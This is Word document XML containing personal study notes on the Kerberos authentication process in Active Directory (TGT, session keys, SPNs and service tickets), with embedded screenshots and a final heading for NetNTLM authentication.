      <w:r w:rsidRPr="00710593">
        <w:lastRenderedPageBreak/>
        <w:t>Kerberos is a computer network authentication protocol that operates based on tickets, allowing nodes to securely prove their identity to one another over a non-secure network. It primarily aims at a client-server model and provides mutual authentication, where the user and the server verify each other's identity. The Kerberos protocol messages are protected against eavesdropping and replay attacks, and it builds on symmetric-key cryptography, requiring a trusted third party.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3392788B" w14:textId="3154B308" w:rsidR="00710593" w:rsidRDefault="00710593" w:rsidP="00710593">
      <w:r w:rsidRPr="00710593">
        <w:t>Users who log into a service using Kerberos will be assigned tickets. Think of tickets as proof of a previous authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C0D49D" w14:textId="77777777" w:rsidR="00710593" w:rsidRDefault="00710593" w:rsidP="00710593"/>
    <w:p w14:paraId="15ACF849" w14:textId="1D1FDC43" w:rsidR="00710593" w:rsidRDefault="00710593" w:rsidP="00710593">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00710593">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kerberos authentication process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A4ABD4" w14:textId="6F1F4968" w:rsidR="00710593" w:rsidRDefault="009C098A" w:rsidP="009C098A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C098A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">The user sends their </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C098A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C098A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a timestamp encrypted using a key derived from their password to the Key Distribution Center (KDC), a service usually installed on the Domain Controller in charge of creating Kerberos tickets on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFBCF0E" w14:textId="77777777" w:rsidR="004B0727" w:rsidRDefault="004B0727" w:rsidP="004B0727">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="177B1547" w14:textId="464FCAF1" w:rsidR="009C098A" w:rsidRDefault="009C098A" w:rsidP="009C098A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C098A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>The KDC will create and send back a Ticket Granting Ticket (TGT), which will allow the user to request additional tickets to access specific services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> and this TGT is encrypted with a key that user can’t decrypt, this ticket is to get another ticket (</w:t>
      </w:r>
      <w:r w:rsidRPr="009C098A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>service tickets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>that used to access specific resource)</w:t>
      </w:r>
      <w:r w:rsidRPr="009C098A">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009C098A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>without passing their credentials every time they want to connect to a service</w:t>
      </w:r>
      <w:r w:rsidR="008C3500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> just will pass the ticket</w:t>
      </w:r>
      <w:r w:rsidRPr="009C098A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> In TGT the </w:t>
      </w:r>
      <w:r w:rsidRPr="009C098A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Session Key is given to the user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> and note that the session key isn’t stored in KDC bec it can get it by </w:t>
      </w:r>
      <w:r w:rsidR="008C3500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>decrypting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> the TGT in the next requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7958AAEE" w14:textId="2E888E5E" w:rsidR="009C098A" w:rsidRDefault="009C098A" w:rsidP="009C098A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C098A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>TGT is encrypted using the krbtgt account's password hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1EE4A5" w14:textId="2C1CDB79" w:rsidR="009C098A" w:rsidRDefault="009C098A" w:rsidP="009C098A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C098A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>KRBTGT is a default account that exists in all domains of an Active Directory</w:t>
      </w:r>
      <w:r w:rsidR="004B0727">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F739A6A" w14:textId="77777777" w:rsidR="004B0727" w:rsidRPr="009C098A" w:rsidRDefault="004B0727" w:rsidP="004B0727">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="667438C9" w14:textId="5A198826" w:rsidR="009C098A" w:rsidRDefault="009C098A" w:rsidP="008C3500">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C098A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="008C3500" w:rsidRPr="008C3500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>When a user wants to connect to a service on the network like a share, website or database, they will use their TGT to ask the KDC for a Ticket Granting Service (TGS). TGS are tickets that allow connection only to the specific service they were created for.</w:t>
      </w:r>
      <w:r w:rsidR="008C3500" w:rsidRPr="008C3500">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C3500" w:rsidRPr="008C3500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>To request a TGS, the user will send their username</w:t>
      </w:r>
      <w:r w:rsidR="008C3500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008C3500" w:rsidRPr="008C3500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>timestamp</w:t>
      </w:r>
      <w:r w:rsidR="008C3500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> and SPN</w:t>
      </w:r>
      <w:r w:rsidR="008C3500" w:rsidRPr="008C3500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> encrypted using the Session Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C627E5" w14:textId="6A192AC8" w:rsidR="008C3500" w:rsidRDefault="008C3500" w:rsidP="008C3500">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C3500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Service Principal Name (SPN), indicates the service and server name we intend to access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48329FE5" w14:textId="77777777" w:rsidR="004B0727" w:rsidRDefault="004B0727" w:rsidP="004B0727">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="750C2295" w14:textId="7F4D65E7" w:rsidR="00513D0E" w:rsidRDefault="00513D0E" w:rsidP="00513D0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00513D0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">KDC will send </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00513D0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> a TGS </w:t>
      </w:r>
      <w:r w:rsidR="004B0727">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidRPr="00513D0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Service Session Key, which we will need to authenticate to the service we want to access. The TGS is encrypted using a key derived from the Service Owner Hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, so we will send the TGS to the Service owner that I need service from it </w:t>
      </w:r>
      <w:r w:rsidR="004B0727">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> it will authenticate us</w:t>
      </w:r>
      <w:r w:rsidR="004B0727">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> by access the Service Sessions Key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidR="004B0727">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>decrypting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> our TGS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECA7C6D" w14:textId="1A80764A" w:rsidR="00513D0E" w:rsidRDefault="00513D0E" w:rsidP="00513D0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00513D0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Service Owner is the user or machine account that the service runs under.</w:t>
      </w:r>
      <w:r w:rsidRPr="00513D0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="44528C72" w14:textId="48F56938" w:rsidR="00513D0E" w:rsidRDefault="00513D0E" w:rsidP="00513D0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00513D0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Service Owner can access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00513D0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">encrypted Service Session </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00513D0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Key it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00513D0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> by decrypting the TGS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5200FBF8" w14:textId="77777777" w:rsidR="004B0727" w:rsidRDefault="004B0727" w:rsidP="004B0727">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EEC2A7E" w14:textId="023F4270" w:rsidR="00513D0E" w:rsidRDefault="004B0727" w:rsidP="004B0727">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> sent the </w:t>
      </w:r>
      <w:r w:rsidRPr="004B0727">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">TGS to the desired service to authenticate and establish a connection. The service will use its configured account's </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004B0727">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>password hash</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004B0727">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> to decrypt the TGS and validate the Service Session Key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F998F6A" w14:textId="77777777" w:rsidR="004B0727" w:rsidRDefault="004B0727" w:rsidP="004B0727">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6712B4C8" w14:textId="77777777" w:rsidR="004B0727" w:rsidRDefault="004B0727" w:rsidP="004B0727">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DDB620B" w14:textId="77777777" w:rsidR="004B0727" w:rsidRDefault="004B0727" w:rsidP="004B0727">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E5719AA" wp14:editId="49644C78">
            <wp:extent cx="5243830" cy="1751965"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1420131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31789" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="3031" r="8705" b="71832"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5246103" cy="1752724"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC72EB7" w14:textId="77777777" w:rsidR="004B0727" w:rsidRDefault="004B0727" w:rsidP="004B0727">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BAFC717" w14:textId="414B8F59" w:rsidR="004B0727" w:rsidRDefault="004B0727" w:rsidP="004B0727">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74763FDC" wp14:editId="0A0D74EE">
            <wp:extent cx="5126182" cy="1924685"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13965817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1751" name="Picture 3" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="4517" t="41508" r="11865" b="27545"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5128667" cy="1925618"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA440E1" w14:textId="44D432DB" w:rsidR="004B0727" w:rsidRDefault="004B0727" w:rsidP="004B0727">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A37C16A" wp14:editId="58B57847">
            <wp:extent cx="5334000" cy="1677534"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="166815102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1024" name="Picture 2" descr="A close-up of a sign&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="-2384" t="1690" r="5772" b="-1690"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5340488" cy="1679575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41565995" w14:textId="77777777" w:rsidR="004B0727" w:rsidRDefault="004B0727" w:rsidP="004B0727">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE512DF" w14:textId="4211E7CD" w:rsidR="000D0BDC" w:rsidRDefault="000D0BDC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F687CD" w14:textId="4938991A" w:rsidR="000D0BDC" w:rsidRDefault="000D0BDC" w:rsidP="000D0BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0BDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NetNTLM Authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
